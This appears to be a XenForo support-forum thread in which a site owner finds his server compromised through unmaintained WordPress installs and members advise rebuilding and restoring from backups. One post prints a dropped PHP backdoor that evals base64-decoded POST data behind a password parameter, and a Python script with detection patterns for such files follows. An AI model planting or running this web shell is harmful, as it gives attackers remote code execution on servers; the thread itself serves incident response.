
XF 1.4 Google saying: "This site may be hacked"

Daniel-SP

Active member
#1
Hello guys,

I have come across a massive decrease of pages indexed by Google and, checking WebMaster Tools, I saw a warning telling me that my website might be hacked.

They say that third-party people just put malicious content into my forum and give me some URLs.

Accessing them, they are pure HTML pages without any relation to Xenforo, inside my domain.

How can I get over this? I don't know how much it's related to XenForo, but my forum is running normally if I browse it.

Some more information: I just run XenForo on my Linode instance that has been configured by the amazing service of @MattW
 

Tracy Perry

Well-known member
#2
Are you also by chance running WordPress anywhere on that Linode instance?
You will first need to find the method used for the intrusion and injection of the HTML pages that are getting picked up and lock that down.
Then you proceed with the cleanup (which depending on how the intrusion occurred could be extensive).
 

Daniel-SP

Active member
#3
Are you also by chance running WordPress anywhere on that Linode instance?
You will first need to find the method used for the intrusion and injection of the HTML pages that are getting picked up and lock that down.
Then you proceed with the cleanup (which depending on how the intrusion occurred could be extensive).
Yes, I do have a wordpress instance.

Google is pointing to a URL of the domain of the forum itself, not the WordPress instance.

Any tip on how I will be able to find that?

Well.. I'm finding strange content everywhere. I got like 4 instances of WordPress that I really don't touch much, and all of them plus my XenForo folders have recently modified files with strange content
 

Mouth

Well-known member
#4
Your server is compromised.
You need to ensure your old backups are in working order, ask your server provider to re-install your operating system, ensure it's secured and hardened, and then restore from an old backup prior to compromise.
There are a couple of businesses listed within here that are well recommended for setting up, and maintaining, secure servers, if you don't know how to do it yourself.
 

Daniel-SP

Active member
#5
Your server is compromised.
You need to ensure your old backups are in working order, ask your server provider to re-install your operating system, ensure it's secured and hardened, and then restore from an old backup prior to compromise.
There are a couple of businesses listed within here that are well recommended for setting up, and maintaining, secure servers, if you don't know how to do it yourself.
Looks like I'm in serious trouble. Right now that I will need to renew my XenForo license to upgrade and avoid those problems..lol

For the WordPress instances, I'm just deleting them since they are nothing but old sites that I don't even maintain anymore.
 

Brogan

XenForo moderator
Staff member
#6
Upgrading XF won't resolve anything.

You will need to perform a forensic examination of the server, patch the hole, and restore from a known good backup or comb through the database and every file and remove any malicious code.
 

Tracy Perry

Well-known member
#7
Yes, I do have a wordpress instance.

Google is pointing an URL of the domain of the forum itself, not the wordpress instance.

Any tip on how I will be able to find that?

Well.. I'm finding strange content everywhere. I got like 4 instances of wordpress that I really dont touch much and all of them plus my xenforo folders have recent modified files with strange content
WordPress is a known attack (and intrusion) vector. If you don't have all the sites (and their associated plugins) kept up to date it's most likely where the entry was done from.
Once they make entry they can traverse any of the sites on the server.

For the WordPress instances, I'm just deleting them since they are nothing but old sites that I don't even maintain anymore.
And this is most likely the reason you got hacked.
With WordPress, if you aren't going to maintain the sites (keep them updated) then you need to remove all instances of them.

The only reliable way to recover will be to spin the server back out as a new one and then restore from known good backups.
 

Daniel-SP

Active member
#9
Upgrading XF won't resolve anything.

You will need to perform a forensic examination of the server, patch the hole, and restore from a known good backup or comb through the database and every file and remove any malicious code.

WordPress is a known attack (and intrusion) vector. If you don't have all the sites (and their associated plugins) kept up to date it's most likely where the entry was done from.
Once they make entry they can traverse any of the sites on the server.


And this is most likely the reason you got hacked.
With WordPress, if you aren't going to maintain the sites (keep them updated) then you need to remove all instances of them.

The only reliable way to recover will be to spin the server back out as a new one and then restore from known good backups.

Well, as a starting point, I am just deleting every instance of WordPress I have, since I don't have any activity there anymore.

After it's done, I will get some help to recover to a backup I have here from last year of my XF, since I haven't touched it since then.. I just need to find it, hehe.

I backed up a WordPress folder that I have to my local machine and Windows Defender pointed out some malicious content, so it looks like it came from WordPress like you said.

Is your XenForo 1.4 patched up all the way to 1.5.13?
Review the plugins you're using as well.
Not yet.. And after the responses I got, I'm not doing it until I'm sure that the problem is over.
 

MattW

Well-known member
#10
You have a phpmail folder uploaded inside your XenForo folder on the 21st Feb, which has infected the rest of the site. They have got into all the sites via WordPress.
Code:
[root@li121-82 public]# cat upgrade.php 
This website is ok!!</br>
<?=$_SERVER['DOCUMENT_ROOT']?>
<?php if($_GET["login"]=="snvcu"){ echo success; $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;");}} ?>
[root@li121-82 public]#
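A first-pass triage of the kind described in this post, as an added example that is not from the thread or from XenForo: it walks a web root and reports PHP files modified since a cutoff date or carrying the textual markers the dropped files on this page share (eval over base64_decode'd request input, chr/ord decoders, variable function calls). The web root, the XenForo-style index.php and the marker-only fixture are constructed; the fixture carries the strings inside a comment and never executes.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

# Text markers taken from the two dropped files in this thread: eval() fed from
# base64_decode()'d POST data, and a chr(ord()) decoder that assembles a function
# name at runtime and then calls it through a variable ($name("")).
MARKERS = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(")),
    ("request_input", re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")),
    ("variable_function_call", re.compile(r"\$[A-Za-z_]\w*\s*\(")),
    ("chr_ord_decoder", re.compile(r"\bchr\s*\(\s*ord\b")),
]

def is_suspicious(markers):
    # One marker alone ($_POST in a form handler, say) is noise; eval plus any
    # other marker, or three markers of any kind, is worth a human look.
    return ("eval" in markers and len(markers) >= 2) or len(markers) >= 3

def scan_file(path, cutoff):
    """mtime is a first filter only: an intruder can back-date it, so content markers decide."""
    with open(path, errors="replace") as fh:
        body = fh.read()
    found = [name for name, pat in MARKERS if pat.search(body)]
    mtime = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
    return {"path": path, "recent": mtime >= cutoff,
            "markers": found, "suspicious": is_suspicious(found)}

def scan_tree(root, cutoff, exts=(".php", ".phtml", ".inc")):
    """Walk a web root; keep files modified since cutoff or carrying enough markers."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                r = scan_file(os.path.join(dirpath, name), cutoff)
                if r["recent"] or r["suspicious"]:
                    hits.append(r)
    return sorted(hits, key=lambda r: r["path"])

def demo():
    """Constructed web root: an untouched index.php plus a dropped phpmail/upgrade.php fixture."""
    root = tempfile.mkdtemp(prefix="webroot_")
    clean = os.path.join(root, "index.php")
    with open(clean, "w") as fh:
        fh.write("<?php\n$fc = new XenForo_FrontController(new XenForo_Dependencies_Public());\n$fc->run();\n")
    old = datetime(2016, 1, 1, tzinfo=timezone.utc).timestamp()
    os.utime(clean, (old, old))               # last touched a year before the cutoff
    os.mkdir(os.path.join(root, "phpmail"))
    with open(os.path.join(root, "phpmail", "upgrade.php"), "w") as fh:
        # marker-only fixture inside a PHP comment: scanned as text, never run
        fh.write("<?php\n// fixture: $d = base64_decode($_POST['z0']); @eval($d);\n")
    return scan_tree(root, datetime(2017, 2, 20, tzinfo=timezone.utc))
```

Point `scan_tree` at a real document root with the date of the first suspicious upload and review every hit by hand; a clean report does not prove the box is clean, which is why the thread's advice to rebuild and restore still stands.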
 

MattW

Well-known member
#11
Guess who wrote this file...........
Code:
<?php

/**
 * Class Listener Class for EventListener.
 *
 * @package *******_*******Helper
 * Version 1.0.0
 */
:whistle:
 

Tracy Perry

Well-known member
#13
Guess who wrote this file...........
Code:
 *
 * @package *******_*******Helper
 * Version 1.0.0
 */
:whistle:
Hmmmm... couldn't be our poor misunderstood individual from the Asiatic countries who keeps coding call-backs into his add-ons (and people keep using them even now because some of his stuff is "cool"), could it?
 

Daniel-SP

Active member
#14
Hmmmm... couldn't be our poor misunderstood individual from the Asiatic countries who keeps coding call-backs into his add-ons (and people keep using them even now because some of his stuff is "cool"), could it?
Well, I had some custom add-ons made by them (way too specific and expensive, at least for me.. $400+ spent) that I asked for years before all the trouble, and I haven't had cash to ask for another development. Btw, let's make it right this time.
 

Daniel-SP

Active member
#16
Years before all the trouble was identified and proven.

They were always pirates and hackers.
03/31/2014 to be more precise.. Just grabbed the date from my quote, lol..

I know it's not a reason, I should have taken action when I saw the thread talking about it.
 

Tracy Perry

Well-known member
#18
Who are you guys talking about, we're not all part of the clique.
<removed before I get a rules violation warning from Broganator!>
He's a known hacker and anyone using his add-ons/styles are just asking to be hacked.

EDIT:
Brogan linked to the full discussion... the individual in question is named in the NOTE: portion of the first post of said thread linked to.
 